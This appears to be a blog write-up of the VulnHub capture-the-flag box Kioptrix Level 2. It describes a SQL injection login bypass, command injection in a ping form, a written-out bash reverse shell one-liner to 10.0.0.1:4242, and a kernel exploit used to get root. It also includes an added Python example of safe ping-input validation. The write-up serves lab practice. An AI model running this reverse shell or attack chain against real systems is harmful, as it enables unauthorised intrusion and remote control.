Kioptrix Level 2 — VulnHub

Abdul Wassay (aka HotPlugin)
4 min read · Jan 15, 2022


Kioptrix 1.1 — VulnHub

Introduction:

Hello everyone. As I announced in the previous write-up, I will be doing the Kioptrix series from VulnHub. In the previous write-up, I did the first box, Kioptrix Level 1. Today, I am writing about the second box in the series, Kioptrix Level 2 (also called Kioptrix 1.1). This was an easy box. For the initial foothold, we had a SQL injection and a command injection. Then, a vulnerable kernel led us to root. So, let’s start.

Methodology:

First, we start by running a full TCP port scan, which lists the open ports. Then, we run an aggressive scan against the ports found.

We can see that 7 ports are open. A MySQL server is also exposed, but we are not authorized to access it. On port 631, there is a vulnerable CUPS version, but we cannot access it. So, navigating to HTTP (80) and HTTPS (443), both had the same login page.

Running gobuster didn’t lead us anywhere, so I tried a basic SQLi payload, which successfully logged me in.

On the homepage, there was an input field that asked for an IP address and said it would ping that IP.

Entering an IP address gives the output of the ping command.

Then, I checked the request sent by the input field. It was POSTing the IP address as the ip parameter. So, I thought there might be a command injection if this parameter is passed directly to the ping command. I tested for command injection, and it worked.
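As an added example (not code from the write-up or from the Kioptrix box itself), here is how a ping page like the one above could handle the ip parameter safely in Python: the value is validated as an IP literal and handed to ping as a single argv element, so there is no shell command line for the parameter to be injected into. The function names are my own.

```python
import ipaddress
import platform
import subprocess
from typing import List

# Added example, not the vulnerable Kioptrix page: the POSTed "ip" value is
# treated strictly as data. ipaddress.ip_address() accepts only a well-formed
# IPv4/IPv6 literal, so hostnames and anything carrying shell metacharacters
# (';', '|', '&&', '`', '$(') are rejected before a command is ever built.


def parse_ping_target(raw: str) -> str:
    """Return the canonical IP string for ``raw`` or raise ValueError."""
    candidate = raw.strip()
    try:
        addr = ipaddress.ip_address(candidate)
    except ValueError as exc:
        raise ValueError(f"not an IP address: {candidate!r}") from exc
    # Refuse targets that make no sense for a single ping.
    if addr.is_multicast or addr.is_unspecified:
        raise ValueError(f"refusing to ping {addr}")
    return str(addr)


def is_valid_ping_target(raw: str) -> bool:
    """True if ``raw`` would be accepted by parse_ping_target()."""
    try:
        parse_ping_target(raw)
    except ValueError:
        return False
    return True


def build_ping_argv(raw: str) -> List[str]:
    """Build the argv list for ping; the target is always one argument."""
    target = parse_ping_target(raw)
    count_flag = "-n" if platform.system() == "Windows" else "-c"
    return ["ping", count_flag, "1", target]


def run_ping(raw: str, timeout: float = 5.0) -> str:
    """Run the validated ping without a shell and return its stdout."""
    proc = subprocess.run(build_ping_argv(raw), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    print(run_ping("127.0.0.1"))
```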

Then, I used the reverse shell payload from the PayloadsAllTheThings repository and successfully got a shell.

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Privilege Escalation:

For privilege escalation, I started with some basic enumeration. First, I found that there were two users on the machine, but we can’t access their home directories.

I also tried to access the MySQL service, but the database was empty. So, after trying everything, I did some system enumeration, which revealed the kernel version and some useful information about the distro and the gcc compiler.

Googling the kernel version revealed that this version was vulnerable and that exploiting it could lead to privilege escalation.

https://www.exploit-db.com/exploits/9542

So, I cloned the PoC from a GitHub repo and transferred it to the target machine using the Python HTTP server.

On the target machine, since I knew that the gcc compiler was available, I compiled the exploit with it and successfully got root.

Thanks.
